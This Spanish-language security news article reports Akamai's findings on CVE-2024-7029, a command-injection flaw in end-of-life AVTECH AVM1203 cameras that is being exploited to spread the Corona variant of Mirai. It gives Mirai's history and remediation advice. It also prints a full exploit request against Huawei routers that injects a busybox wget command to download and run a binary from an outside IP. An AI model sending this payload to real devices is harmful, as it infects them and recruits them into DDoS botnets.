CVE-2024-7029: una vulnerabilidad en cámaras AVTECH revive el botnet Mirai

La empresa Akamai ha detectado una nueva ola de ataques dirigidos a cámaras de videovigilancia obsoletas del fabricante taiwanés AVTECH. Los atacantes están explotando una vulnerabilidad crítica en el modelo AVM1203 para propagar malware de la familia Mirai.

La vulnerabilidad, identificada como CVE-2024-7029, permite la ejecución remota de código arbitrario en el dispositivo. Aunque el problema es conocido desde hace unos 5 años, fue reconocido y registrado oficialmente solo este mes. Los expertos de Akamai han observado un uso activo de esta brecha por parte de hackers desde marzo de este año. Para detectar los ataques, los investigadores desplegaron una red de trampas que imitaban cámaras vulnerables en internet.

El botnet Mirai se dio a conocer por primera vez en 2016, cuando se utilizó para realizar un potente ataque DDoS contra el sitio del experto en ciberseguridad Brian Krebs. En las semanas siguientes, se empleó para atacar proveedores de internet y otros objetivos. Uno de estos ataques, dirigido al proveedor de DNS Dyn, provocó fallos generalizados en muchos servicios web populares.

La situación se complicó cuando los creadores de Mirai publicaron el código fuente del malware, lo que permitió a casi cualquier persona crear sus propias variantes para llevar a cabo ataques DDoS de una magnitud sin precedentes. Según Kyle Lefton, investigador del equipo de respuesta a amenazas de Akamai, han observado ataques DDoS utilizando cámaras infectadas contra "varias organizaciones". Sin embargo, aún no hay pruebas de que los atacantes estén utilizando las cámaras para espiar o ver transmisiones de video.

La vulnerabilidad explotada está relacionada con un manejo incorrecto del parámetro brightness en una solicitud al archivo /cgi-bin/supervisor/Factory.cgi. Esto permite la inyección de comandos maliciosos. Durante el ataque, se carga un archivo JavaScript en el dispositivo, que luego descarga y ejecuta la carga útil principal, una variante de Mirai llamada Corona. Una vez que el dispositivo está infectado, el malware intenta propagarse conectándose a otros hosts a través de Telnet. Además, explota otras vulnerabilidades, incluyendo RCE en Hadoop YARN, CVE-2014-8361 y CVE-2017-17215.

Aquí hay un ejemplo de código utilizado para explotar vulnerabilidades en enrutadores Huawei:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username=\»dslf-config\», realm=\»HuaweiHomeGateway\», nonce=\»88645cefb1f9ede0e336e3569d75ee30\», uri=\»/ctrlt/DeviceUpgrade_1\», response=\»3612f843a42db38f48f59d2a3597e19c\», algorithm=\»MD5\», qop=\»auth\», nc=00000001, cnonce=\»248d1a2560100669\» $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

Dado que el modelo de cámara vulnerable AVM1203 ya no cuenta con soporte del fabricante, los expertos recomiendan a los usuarios dejar de usarla por completo y reemplazarla por dispositivos más modernos. Además, los especialistas recuerdan una vez más la importancia de cambiar las credenciales predeterminadas en todos los dispositivos conectados a internet.